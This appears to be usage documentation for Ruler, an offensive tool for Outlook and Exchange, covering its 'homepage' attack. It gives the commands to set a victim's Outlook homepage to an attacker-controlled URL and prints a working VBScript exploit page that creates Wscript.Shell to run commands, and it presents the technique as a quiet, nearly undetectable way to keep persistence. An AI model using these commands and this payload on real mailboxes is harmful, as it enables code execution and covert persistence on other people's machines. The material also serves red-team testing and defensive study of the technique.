Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.
The low down on the homepage attack is explained in the Outlook Home Page blog post.
To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:
You can view the current homepage value using the
display command. This will display the current URL and whether this is active or not.
./ruler --email email@example.com homepage display
Setting a new homepage couldn't be simpler, you simply use Ruler to set the new homepage to your exploit URL:
./ruler --email firstname.lastname@example.org homepage add --url "http://yourserver/pew.html"
The homepage attack requires your custom homepage to contain the "exploit", a basic version of this is:
<html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Outlook</title> <script id=clientEventHandlersVBS language=vbscript> <!-- Sub window_onload() Set Application = ViewCtl1.OutlookApplication Set cmd = Application.CreateObject("Wscript.Shell") cmd.Run("notepad") End Sub --> </script> </head> <body> <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object> </body> </html>
Deleting an existing is done in a similar way to deleting rules.
./ruler --email email@example.com homepage delete
Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943